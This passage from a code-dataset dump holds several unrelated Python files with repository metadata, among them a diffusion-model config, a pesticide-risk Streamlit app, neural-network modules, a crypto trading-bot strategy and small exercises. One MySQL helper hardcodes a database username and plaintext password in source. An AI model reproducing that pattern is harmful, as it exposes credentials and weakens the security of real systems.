args, \"decoder_ffn_embed_dim\", args.encoder_ffn_embed_dim\n )\n\n args.decoder_input_dim = getattr(args, \"decoder_input_dim\", args.latent_dim)\n args.decoder_output_dim = getattr(args, \"decoder_output_dim\", args.decoder_input_dim)\n\n args.decoder_layers = getattr(args, \"decoder_layers\", 6)\n args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 8)\n args.decoder_normalize_before = getattr(args, \"decoder_normalize_before\", False)\n args.decoder_learned_pos = getattr(args, \"decoder_learned_pos\", False)\n args.attention_dropout = getattr(args, \"attention_dropout\", 0.0)\n args.activation_dropout = getattr(args, \"activation_dropout\", 0.0)\n args.activation_fn = getattr(args, \"activation_fn\", \"relu\")\n args.dropout = getattr(args, \"dropout\", 0.1)\n args.adaptive_softmax_cutoff = getattr(args, \"adaptive_softmax_cutoff\", None)\n args.adaptive_softmax_dropout = getattr(args, \"adaptive_softmax_dropout\", 0)\n args.share_decoder_input_output_embed = getattr(\n args, \"share_decoder_input_output_embed\", False\n )\n args.share_all_embeddings = getattr(args, \"share_all_embeddings\", False)\n args.share_project_in_dim = getattr(args, \"share_project_in_dim\", False)\n\n args.no_token_positional_embeddings = getattr(\n args, \"no_token_positional_embeddings\", False\n )\n args.adaptive_input = getattr(args, \"adaptive_input\", False)\n args.apply_bert_init = getattr(args, \"apply_bert_init\", 
False)\n\n    # --- special arguments ---\n    args.sg_length_pred = getattr(args, \"sg_length_pred\", False)\n    args.pred_length_offset = getattr(args, \"pred_length_offset\", False)\n    args.length_loss_factor = getattr(args, \"length_loss_factor\", 0.1)\n\n    args.diffusion_steps = getattr(args, \"diffusion_steps\", 2000)\n\n    args.noise_schedule = getattr(args, \"noise_schedule\", \"linear\")\n    args.noise_factor = getattr(args, \"noise_factor\", 1.0)\n    args.rescale_factor = getattr(args, \"rescale_factor\", 1.0)\n\n    args.embed_norm = getattr(args, \"embed_norm\", False)\n    args.embed_norm_affine = getattr(args, \"embed_norm_affine\", False)\n    args.embed_norm_before_proj = getattr(args, \"embed_norm_before_proj\", False)\n\n    args.self_cond = getattr(args, \"self_cond\", False)\n    args.self_cond_before_proj = getattr(args, \"self_cond_before_proj\", False)\n\n    args.rounding_loss = getattr(args, \"rounding_loss\", False)\n\n    args.rescale_timesteps = getattr(args, \"rescale_timesteps\", False)\n\n\n@register_model_architecture(\"difformer\", \"difformer_base\")\ndef difformer_base(args):\n    args.model_dim = getattr(args, \"model_dim\", 768)\n    args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 3072)\n    args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 12)\n\n    args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 3072)\n    args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 12)\n\n    base_architecture(args)\n\n\n@register_model_architecture(\"difformer\", \"difformer_iwslt_de_en\")\ndef difformer_nat_iwslt_de_en(args):\n    args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 1024)\n    args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 4)\n\n    args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 1024)\n    args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 4)\n\n    base_architecture(args)\n\n\n@register_model_architecture(\"transformer\", \"transformer_base\")\ndef transformer_base(args):\n    args.encoder_embed_dim = getattr(args, \"encoder_embed_dim\", 768)\n    args.encoder_ffn_embed_dim = getattr(args, \"encoder_ffn_embed_dim\", 3072)\n    args.encoder_attention_heads = getattr(args, \"encoder_attention_heads\", 12)\n    args.decoder_embed_dim = getattr(args, \"decoder_embed_dim\", 768)\n    args.decoder_ffn_embed_dim = getattr(args, \"decoder_ffn_embed_dim\", 3072)\n    args.decoder_attention_heads = getattr(args, \"decoder_attention_heads\", 12)\n    transformer.base_architecture(args)\n","repo_name":"zhjgao/difformer","sub_path":"difformer/difformer.py","file_name":"difformer.py","file_ext":"py","file_size_in_byte":16811,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"}
{"seq_id":"22073366261","text":"PLUS = '+'\nMINUS = '-'\nDIVIDE = '/'\n\n\n# lin : [level, [n, previousops]]\ndef reduce(lin):\n    level = lin[0]\n    siz = len(lin)\n    lout = [level+1]\n    for i in range(1, siz):\n        olde_n = lin[i][0]\n        if olde_n == 1:\n            continue\n        olde_o = lin[i][1]\n        # if n even 3 possibilities\n        if olde_n%2 == 0:\n            lout.append([])\n        \n        \n        \n        \n        \n        \n","repo_name":"orey/stuff","sub_path":"dev/foobar/test04v9.py","file_name":"test04v9.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36470727610","text":"\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\n\nfrom rdkit import Chem\nfrom rdkit.Chem import 
Draw\nfrom rdkit.Chem import inchi\nfrom rdkit import DataStructs\n\nour_color_discrete_map={\n \"unknown\": \"rgba(180, 180, 180, 0.24)\",\n \"low\": \"rgba(5, 192, 5, 0.74)\",\n \"medium\": \"rgba(255, 112, 0, 0.74)\",\n \"high\": \"rgba(224, 19, 19, 0.74)\",\n \"watching\": \"blue\"\n }\n\ndef user_input_features(bees):\n pesticides = [\"{} - {}\".format(a_, b_) for a_, b_ in zip(bees.index.map(str).values , bees['name'].values)]\n pesticide_selection = st.sidebar.selectbox('Which pesticide would you like to know more about?', pesticides)\n n_neighbours = st.sidebar.slider('Neighbours', 1, 10, 3)\n \n data = {'n_neighbours': n_neighbours,\n 'pesticide_selection': pesticide_selection}\n features = pd.DataFrame(data, index=[0])\n return features\n\ndef give_nearest_n(proj_3d, point, k):\n n = proj_3d.shape[0]\n data = proj_3d.copy()\n\n dist_matrix = np.zeros((n, n))\n for i in range(1,n):\n dist = np.linalg.norm(data[:i,:]-data[i,:] , axis=1)\n for id, d in enumerate(dist):\n dist_matrix[i,id] = d\n\n dist_matrix = dist_matrix + dist_matrix.T\n\n nearest_n = np.zeros_like(dist_matrix, dtype=int)\n for id, row in enumerate(dist_matrix):\n nearest_n[id] = np.argsort(row)\n nearest_n = nearest_n[:,1:]\n return nearest_n[point, 0:k]\n\ndef show_atom_number(mol, label):\n for atom in mol.GetAtoms():\n atom.SetProp(label, str(atom.GetIdx()+1))\n return mol\n\ndef get_labels(bees, slected_pesticide_idx):\n y_full = bees['honeybees_contact_kill_risk'].values\n y_full = y_full.add_categories('watching')\n y_full[slected_pesticide_idx] = 'watching' # What point do you want to watch?\n\n return y_full\n\ndef plot_2d(proj_2d, bees, slected_pesticide_idx):\n y_full = get_labels(bees, slected_pesticide_idx)\n\n fig_2d = px.scatter(\n proj_2d, x=0, y=1,\n hover_data=[bees.index.map(str).values, bees['name'].values],\n color=y_full, labels={'color': 'risk'},\n color_discrete_map=our_color_discrete_map,\n )\n return fig_2d\n\ndef plot_3d(proj_3d, bees, slected_pesticide_idx):\n y_full = get_labels(bees, slected_pesticide_idx)\n\n\n fig_3d = px.scatter_3d(\n proj_3d, x=0, y=1, z=2,\n hover_data=[bees.index.map(str).values, bees['name'].values],\n color=y_full, labels={'color': 'risk'},\n color_discrete_map=our_color_discrete_map,\n )\n fig_3d.update_traces(marker_size=5)\n\n fig_3d.show()\n\n return fig_3d\n\n\ndef streamlit_stuff():\n\n st.write(\"\"\"\n # Bee-Friendly Pesticide Classifier\n\n This app lets you choose one pesticide from a collection of pesticides and predicts the risk of death for a bee if she encounters that specific pesticide.\n We infer the risk by looking at the risk-rating of similar pesticides (from a chemical molecule structure perspective).\n \"\"\")\n\n st.sidebar.header('User Input Parameters')\n\n bees = pd.read_pickle('scraped_molecules_honeybees_working.pickle')\n bees['honeybees_contact_kill_risk'] = bees['honeybees_contact_kill_risk'].cat.add_categories('unknown').fillna(\"unknown\")\n df = user_input_features(bees)\n\n st.subheader('User Input Parameters')\n st.write(df)\n\n slected_pesticide = df['pesticide_selection'].values[0]\n slected_pesticide_idx = int(slected_pesticide.split(\"-\")[0][:-1])\n st.write(slected_pesticide, slected_pesticide_idx)\n\n proj_2d = np.load(\"2317_proj_2d.npy\")\n st.header(\"2D UMAP\")\n st.plotly_chart(plot_2d(proj_2d, bees, slected_pesticide_idx))\n\n proj_3d = np.load(\"2317_proj_3d.npy\")\n st.header(\"3D UMAP\")\n st.plotly_chart(plot_3d(proj_3d, bees, slected_pesticide_idx))\n\n\n slected_pesticide_row = 
bees.iloc[slected_pesticide_idx, :]\n    st.header(\"Info about \" + slected_pesticide_row['name'])\n    st.write(f\"This one is currently classified as {str(slected_pesticide_row['honeybees_contact_kill_risk'])}.\")\n\n    m = inchi.MolFromInchi(slected_pesticide_row['inchi'])\n    fig = Draw.MolToMPL(m)\n    st.pyplot(fig)\n\n\n\n    # K-NN\n    st.subheader('Nearest Neighbours')\n\n    k = int(df['n_neighbours'].values[0])\n    nn = give_nearest_n(proj_3d, slected_pesticide_idx, k)\n    st.write(nn)\n\n    df_nn = bees.iloc[nn]\n    st.write(df_nn)\n\n    for n in nn:\n        # st.write(df_nn.loc[n])\n        st.subheader('Neighbour ' + df_nn.loc[n, 'name'] + ': ' + str(df_nn.loc[n, 'honeybees_contact_kill_risk']))\n        nn_mol = inchi.MolFromInchi(df_nn.loc[n, 'inchi'])\n        fig = Draw.MolToMPL(nn_mol)\n        st.pyplot(fig)\n\n\n\n\n    # st.subheader('Class labels and their corresponding index number')\n    # st.write(iris.target_names)\n\n    # st.subheader('Prediction')\n    # st.write(iris.target_names[prediction])\n\n\n    # st.subheader('Prediction Probability')\n    # st.write(prediction_proba)\n\nstreamlit_stuff()","repo_name":"ScholliYT/bee-friendly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74585333866","text":"\nimport datetime\nimport decimal\n\nimport pymysql.cursors\nfrom pymysql import Date, Time, Timestamp\nimport time\n\nDB_PASS = 'tabard5]deathblows'\nDB_USER = 'app'\nDB_NAME = 'ambi'\n\n\ndef makeConnection(db_name=DB_NAME):\n\treturn pymysql.connect(\n\t\thost='localhost',\n\t\tuser=DB_USER,\n\t\tpassword=DB_PASS,\n\t\tdb=db_name,\n\t\tcharset='utf8mb4',\n\t\tcursorclass=pymysql.cursors.DictCursor\n\t\t)\n\n\ndef call_sp(sql):\n\tconnection = makeConnection()\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(str(sql))\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\t\n\ndef sensorDB(sql):\n\tconnection = makeConnection(db_name='Sensor')\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(sql)\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\n\ndef call_sql(raw_sql:str):\n\tconnection = makeConnection()\n\ttry:\n\t\twith connection.cursor() as cursor:\n\t\t\tcursor.execute(raw_sql)\n\t\t\tresult = cursor.fetchall()\n\t\tconnection.commit()\n\tfinally:\n\t\tconnection.close()\n\tif result is None:\n\t\tresult = 0\n\treturn result\n\n\n# type stuff\ndef now():\n\treturn time.strftime('%Y-%m-%d %H:%M:%S')\n\ndef DateFromTicks(ticks):\n\treturn Date(*time.localtime(ticks)[:3])\n\ndef TimeFromTicks(ticks):\n\treturn Time(*time.localtime(ticks)[3:6])\n\ndef TimestampFromTicks(ticks):\n\treturn Timestamp(*time.localtime(ticks)[:6])\n\n\ndef json_defaults(obj):\n\tif isinstance(obj, datetime.datetime):\n\t\treturn str(obj)\n\tif isinstance(obj, decimal.Decimal):\n\t\treturn float(obj)\n\tif isinstance(obj, int):\n\t\treturn str(obj)\n\traise TypeError","repo_name":"jmade/Ambilight-Server","sub_path":"lib/python/dblib.py","file_name":"dblib.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18215007709","text":"import pygame\ncor = {'traço': '\\033[35m', 'ex': '\\033[4;31m', 'título': '\\033[1;34m', 'reset': '\\033[m'}\nprint('{}-=-{}'.format(cor['traço'], cor['reset'])*18, '{} Exercise 021 {}'.format(cor['ex'], cor['reset']),\n
      '{}-=-{}'.format(cor['traço'], cor['reset'])*18)\nprint('{}Write a Python program that opens and plays the audio of an MP3 file.{}'\n      .format(cor['título'], cor['reset']))\nprint('{}-=-{}'.format(cor['traço'], cor['reset'])*42)\npygame.init()\npygame.mixer.music.load('king.mp3')\npygame.mixer.music.play()\n# block until playback finishes; pygame.event.wait() needs a display and can return before the song ends\nwhile pygame.mixer.music.get_busy():\n    pygame.time.Clock().tick(10)\n","repo_name":"WesleyOlliver/CursoPython","sub_path":"ex021.py","file_name":"ex021.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37971761054","text":"\"\"\"\nAuthors: William Kozlowski & Jamin Glass\nFile: Main.py\nDate Completed: March 5th, 2023\nMain execution of the flashcard program\n\"\"\"\n\nimport time, GeneralBioCards, GeneralChemCards, GeneralPhysicsCards, CustomFlashcards\n\nprint (\" Flash Card Generator \\nby: William Kozlowski and Jamin Glass\")\n\ntime.sleep(1.5)\n\nwhile True:\n\n    user_choice = input(\"______________________________________\\nPlease input an option below:\\na. General Biology\\nb. General Chemistry\\nc. General Physics\\nd. Custom Flash Cards\\n(please type either 'a', 'b', 'c', or 'd' in the terminal, or type 'exit' to exit the session): \")\n\n    if user_choice == \"a\":\n        print(\"______________________________________\") #easier on the eyes\n        GeneralBioCards.BioCards()\n\n    elif user_choice == \"b\":\n        print(\"______________________________________\") #easier on the eyes\n        GeneralChemCards.ChemCards()\n\n    elif user_choice == \"c\":\n        print(\"______________________________________\") #easier on the eyes\n        GeneralPhysicsCards.PhysicsCards()\n\n    elif user_choice == \"d\":\n        print(\"______________________________________\") #easier on the eyes\n        CustomFlashcards.CustomFlashCards()\n\n    elif user_choice == \"exit\":\n        print(\"______________________________________\\nUntil next time!\")\n        break\n\n    else:\n        print(\"Incorrect input, try again.\")\n\n    ","repo_name":"williamkozlowski/Hackathon2023","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"32670392518","text":"from buttons import Knop\nfrom names import Names\n\ndef setup():\n    global knop, names\n    size(800,400)\n    knop = Knop()\n    names = Names()\n    \n\ndef draw():\n    for i in range(3):\n        knop.button(100+(i*200),10,40,40)\n        names.name(\"Everknown\", 100+(i*200), 50,200,20)\n    noLoop()\n","repo_name":"guanhaowu/Project1-bordspel","sub_path":"boxbuttons/boxbuttons.pyde","file_name":"boxbuttons.pyde","file_ext":"pyde","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36649817111","text":"'''\nImplementation Notes\n\n\nhttps://github.com/deepmind/acme/blob/master/acme/agents/tf/mog_mpo/networks.py#L60\nCritic Architecture:\nnum_dimensions = 1\nnum_components\ninit_scale\n\n\nhttps://github.com/deepmind/acme/blob/f8a4edbcb81165b4cd93fd7926b879f0e7fbfc49/acme/tf/networks/distributional.py#L242\nUnivariateGaussianMixture:\ninit_scale\nnum_components\nnum_dimensions = 1\nmultivariate=False\n\n\nhttps://github.com/deepmind/acme/blob/f8a4edbcb81165b4cd93fd7926b879f0e7fbfc49/acme/tf/networks/distributional.py#L142\nself._scale_factor = init_scale / tf.nn.softplus(0.)\nlogits_size = self._num_dimensions * self._num_components\n\nw_init = tf.initializers.VarianceScaling(1e-5)\nself._logit_layer = snt.Linear(logits_size, w_init=w_init)\nself._loc_layer = 
snt.Linear(self._num_dimensions * self._num_components, w_init=w_init)\nself._scale_layer = snt.Linear(self._num_dimensions * self._num_components, w_init=w_init)\n\nwhen called:\nlogits = self._logit_layer(inputs)\nlocs = self._loc_layer(inputs)\nscales = self._scale_layer(inputs)\n\nscales = self._scale_factor * tf.nn.softplus(scales) + _MIN_SCALE\n\nshape = [-1, self._num_dimensions, self._num_components]\n\nlocs = tf.reshape(locs, shape)\nscales = tf.reshape(scales, shape)\ncomponents_distribution = tfd.Normal(loc=locs, scale=scales)\n\nlogits = tf.reshape(logits, shape)\n\n# Create the mixture distribution.\ndistribution = tfd.MixtureSameFamily(\n mixture_distribution=tfd.Categorical(logits=logits),\n components_distribution=components_distribution\n)\n\ndistribution = tfd.Independent(distribution)\n'''\n\nimport haiku as hk\nfrom jax import nn\nfrom jax import numpy as jnp\n\n\nclass MoGCritic(hk.Module):\n def __init__(self, input_dim, structure, num_groups, num_components, init_scale):\n super().__init__()\n self.structure = structure\n self.num_components = num_components\n self.init_scale = init_scale\n self.num_groups = num_groups\n self.init = hk.initializers.Orthogonal(jnp.sqrt(2.))\n self.out_init = hk.initializers.Orthogonal(1.)\n\n\n def __call__(self, state, action):\n info = {}\n x = jnp.concatenate([state, action], axis=-1)\n info['input'] = x\n\n for i, width in enumerate(self.structure):\n name = f'layer{i}'\n x = hk.Linear(width, w_init=self.init, name=name)(x)\n if self.num_groups:\n x = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'{name}_nosn_ln')(x)\n\n info[name] = x\n x = nn.relu(x)\n\n shape = [-1, 1, self.num_components]\n\n mus = hk.Linear(self.num_components, w_init=self.out_init, name='mus')(x)\n mus = mus.reshape(shape)\n info['mus'] = mus\n\n stdevs = hk.Linear(self.num_components, w_init=self.out_init, name='stdevs')(x)\n stdevs = self.init_scale * nn.softplus(stdevs) / nn.softplus(0.) 
+ 1e-4\n        stdevs = stdevs.reshape(shape)\n        info['stdevs'] = stdevs\n\n        logits = hk.Linear(self.num_components, w_init=self.out_init, name='logits')(x)\n        logits = logits.reshape(shape)\n        info['logits'] = logits\n\n        return info\n","repo_name":"dyth/doublegum","sub_path":"policies_cont/networks/mog_critic.py","file_name":"mog_critic.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"2325823241","text":"import turtle as t\r\na = 10\r\nfor n in range(10):\r\n    for i in range(4):\r\n        t.fd(a)\r\n        t.lt(90)\r\n    t.rt(135)\r\n    t.penup()\r\n    t.fd(a*2**0.5)\r\n    t.pendown()\r\n    t.lt(135)\r\n    a*=3\r\n","repo_name":"ytiolllok/Yuri_b02-011_lab2","sub_path":"turtle5.py","file_name":"turtle5.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36649817111","text":"import torch\nimport torch.nn as nn\n\nclass ChannelSpatialAttention(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size, max_length, ratio=16):\n        super(ChannelSpatialAttention, self).__init__()\n        self.channel_attention = ChannelAttention(in_channels, max_length, ratio)\n        self.spatial_attention = SpatialAttention(out_channels, max_length, kernel_size)\n\n    def forward(self, x):\n        out = self.channel_attention(x)\n        out = self.spatial_attention(out)\n        return out\n\nclass ChannelAttention(nn.Module):\n    def __init__(self, in_channels, max_length, ratio=16):\n        super(ChannelAttention, self).__init__()\n        self.avg_pool = nn.AdaptiveAvgPool1d(max_length) # [batch, in_channels, src_len]\n        self.max_pool = nn.AdaptiveMaxPool1d(max_length) # [batch, in_channels, src_len]\n        self.fc = nn.Sequential(nn.Conv1d(in_channels, in_channels//ratio, 1, bias=False),\n                                nn.ReLU(),\n                                nn.Conv1d(in_channels//ratio, in_channels, 1, bias=False))\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, x):\n        avg_out = self.fc(self.avg_pool(x))\n        max_out = self.fc(self.max_pool(x))\n        out = avg_out + max_out\n        out = self.sigmoid(out) # [batch, in_channels, src_len]\n        return out\n\nclass SpatialAttention(nn.Module):\n    def __init__(self, in_channels, max_length, kernel_size=7):\n        super(SpatialAttention, self).__init__()\n        self.avg_pool = nn.AdaptiveAvgPool1d(max_length)\n        self.max_pool = nn.AdaptiveMaxPool1d(max_length)\n        # concatenating avg- and max-pooled features doubles the channels, so the conv must accept 2 * in_channels\n        self.conv1 = nn.Conv1d(2 * in_channels, in_channels, kernel_size, padding=(kernel_size-1)//2, bias=False)\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, x):\n        # avg_out = torch.mean(x, dim=1, keepdim=True)\n        # max_out, _ = torch.max(x, dim=1, keepdim=True)\n        avg_out = self.avg_pool(x)\n        max_out = self.max_pool(x)\n        out = torch.cat([avg_out, max_out], dim=1) # concatenate along the channel dim: [batch, 2 * in_channels, src_len]\n        out = self.conv1(out) # [batch, in_channels, src_len]\n        out = self.sigmoid(out)\n        return out\n","repo_name":"jiangnanboy/CNN4IE","sub_path":"cnn4ie/channel_spatial_attention_cnn/channel_spatial_attention.py","file_name":"channel_spatial_attention.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
{"seq_id":"43054118006","text":"from binance.exceptions import BinanceAPIException\n\nfrom Bot.AccountBalances import AccountBalances\nfrom Bot.FXConnector import FXConnector\nfrom Bot.TradeEnums import OrderStatus\nfrom Bot.Strategy.EntryStrategy import EntryStrategy, ExitStrategy\nfrom Bot.Strategy.PlaceOrderStrategy import PlaceOrderStrategy\n
from Bot.Strategy.StopLossStrategy import StopLossStrategy\nfrom Bot.Strategy.TradingStrategy import TradingStrategy\nfrom Bot.Target import Target\nfrom Bot.Trade import Trade\n\n\nclass TargetsAndStopLossStrategy(TradingStrategy):\n    def __init__(self, trade: Trade, fx: FXConnector, trade_updated=None, balance=None):\n        super().__init__(trade=trade, fx=fx, trade_updated=trade_updated, balance=balance)\n\n        if trade.has_stoploss() or trade.has_stoploss_in_last_completed_target():\n            self.create_sl_strategy(trade)\n        else:\n            self.strategy_sl = None\n\n        self.strategy_entry = EntryStrategy(trade, fx, trade_updated, True, self.exchange_info, self.balance) \\\n            if trade.has_entry() and not trade.entry.is_completed() else None\n\n        if trade.has_exit() and not trade.exit.is_completed():\n            self.create_exit_strategy(trade)\n        else:\n            self.strategy_exit = None\n\n\n    def describe(self, describe_trade=True):\n        description = '***{}***'.format(self.__str__())\n        if describe_trade:\n            description += '\\nTrade: \\n{0}'.format(self.trade.describe())\n\n        return description\n\n    def create_sl_strategy(self, trade):\n        self.strategy_sl = StopLossStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info, self.balance)\n\n    def create_exit_strategy(self, trade):\n        self.strategy_exit = PlaceOrderStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info,\n                                                self.balance)\n        # if trade.exit.type.is_smart():\n        #     self.strategy_exit = ExitStrategy(trade, self.fx, self.trade_updated, True, self.exchange_info,\n        #                                       self.balance)\n        # elif trade.exit.type.is_target():\n\n\n    def update_trade(self, trade: Trade):\n        super().update_trade(trade)\n        self.last_execution_price = 0\n\n        # [s.update_trade(trade) for s in self.all_strategies()]\n        if trade.has_stoploss() or trade.has_stoploss_in_last_completed_target():\n            if self.strategy_sl:\n                self.strategy_sl.update_trade(trade)\n            else:\n                # create_sl_strategy sets self.strategy_sl itself; it returns None, so do not assign its result\n                self.create_sl_strategy(trade)\n        else:\n            self.strategy_sl = None\n\n        # new trade has exit\n        if trade.has_exit():\n            if self.strategy_exit:\n                self.strategy_exit.update_trade(trade)\n            else:\n                self.create_exit_strategy(trade)\n        else:\n            self.strategy_exit = None\n\n        if trade.has_entry():\n            if self.strategy_entry and trade.is_new():\n                self.strategy_entry.update_trade(trade)\n            else:\n                self.strategy_entry = None\n\n    def execute(self, new_price):\n        if self.is_completed():\n            self.logInfo('Trade Complete')\n            return\n\n        self.last_price = new_price\n\n        if (self.strategy_sl and self.strategy_sl.is_completed()) \\\n                or (self.strategy_exit and self.strategy_exit.is_completed()):\n            self.set_trade_completed()\n            return\n\n        # self.log_price(new_price)\n\n        if new_price == self.last_execution_price:\n            return\n\n        self.last_execution_price = new_price\n\n        if self.trade.status.is_new():\n            if self.strategy_entry:\n                self.strategy_entry.execute(new_price)\n                # # implement market entry\n                # self.trade.status = OrderStatus.ACTIVE\n                # self.trade_updated(self.trade)\n            else: # if no entry is needed\n                self.trade.set_active()\n                self.trigger_target_updated()\n\n        if self.trade.status.is_active():\n            sl_active = False\n            if self.strategy_sl:\n                self.strategy_sl.execute(new_price)\n                sl_active = self.strategy_sl.is_stoploss_order_active()\n\n            if self.strategy_exit and not sl_active:\n                self.strategy_exit.execute(new_price)\n\n    def on_order_status_changed(self, t: Target, data):\n        complete_trade = False\n\n        if t.is_completed():\n            if t.is_entry_target():\n                # validate balance and activate trade only if there are trading targets\n                if self.strategy_exit:\n                    
AccountBalances().update_balances(self.fx.get_all_balances_dict())\n self.trade.cap = self.get_balance_for_side().avail\n self.trade.set_active()\n self.trigger_target_updated()\n else:\n complete_trade = True\n elif t.is_exit_target():\n if self.trade.exit and self.trade.exit.is_completed():\n # if all targets are completed, set trade as completed\n complete_trade = True\n elif t.is_stoploss_target():\n complete_trade = True\n\n if complete_trade:\n self.set_trade_completed()\n\n [s.on_order_status_changed(t, data) for s in self.all_strategies()]\n # if self.strategy_sl:\n # self.strategy_sl.order_status_changed(t, data)\n #\n # if self.strategy_exit:\n # self.strategy_exit.order_status_changed(t, data)\n #\n # if self.strategy_entry:\n # self.strategy_entry.order_status_changed(t, data)\n\n def all_strategies(self):\n s = []\n if self.strategy_sl:\n s.append(self.strategy_sl)\n\n if self.strategy_exit:\n s.append(self.strategy_exit)\n\n if self.strategy_entry:\n s.append(self.strategy_entry)\n\n return s\n\n def emergent_close_position(self):\n try:\n self.cancel_all_open_orders()\n\n AccountBalances().update_balances(self.fx.get_all_balances_dict())\n\n # price = self.exchange_info.adjust_price(self.get_sl_limit_price())\n bal = self.trade.get_cap(self.get_balance_for_side().avail)\n\n volume = round(bal / self.get_single_price(self.last_price), 8) if self.trade_side().is_buy() else bal\n\n if volume < self.exchange_info.minQty:\n adjusted_vol = 0\n else:\n adjusted_vol = self.exchange_info.adjust_quanity(volume)\n\n self.logInfo(\n 'Closing positions ({}): {}, v: {:.08f}'.format(self.symbol(), self.trade_side(), adjusted_vol))\n\n if adjusted_vol > 0:\n order = self.fx.create_makret_order(self.symbol(),\n self.trade_side().name,\n adjusted_vol)\n\n self.logInfo('Positions [{}] Closed'.format(self.symbol()))\n self.trade.set_completed()\n self.trigger_target_updated()\n except BinanceAPIException as bae:\n self.logError(str(bae))\n\n","repo_name":"iilunin/crypto-bot","sub_path":"Bot/Strategy/TargetsAndStopLossStrategy.py","file_name":"TargetsAndStopLossStrategy.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"37"} +{"seq_id":"29115250944","text":"from __future__ import annotations\n\nfrom textwrap import dedent\nfrom typing import Iterable\n\nimport pytest\n\nfrom pants.backend.go import target_type_rules\nfrom pants.backend.go.target_types import GoModTarget\nfrom pants.backend.go.util_rules import (\n assembly,\n build_pkg,\n first_party_pkg,\n go_mod,\n link,\n sdk,\n third_party_pkg,\n)\nfrom pants.backend.go.util_rules.first_party_pkg import (\n FallibleFirstPartyPkgInfo,\n FirstPartyPkgInfoRequest,\n)\nfrom pants.engine.addresses import Address\nfrom pants.engine.fs import PathGlobs, Snapshot\nfrom pants.engine.rules import QueryRule\nfrom pants.testutil.rule_runner import RuleRunner, engine_error\n\n\n@pytest.fixture\ndef rule_runner() -> RuleRunner:\n rule_runner = RuleRunner(\n rules=[\n *go_mod.rules(),\n *first_party_pkg.rules(),\n *sdk.rules(),\n *third_party_pkg.rules(),\n *target_type_rules.rules(),\n *build_pkg.rules(),\n *link.rules(),\n *assembly.rules(),\n QueryRule(FallibleFirstPartyPkgInfo, [FirstPartyPkgInfoRequest]),\n ],\n target_types=[GoModTarget],\n )\n rule_runner.set_options([], env_inherit={\"PATH\"})\n return rule_runner\n\n\ndef test_package_info(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"foo/BUILD\": \"go_mod()\\n\",\n \"foo/go.mod\": 
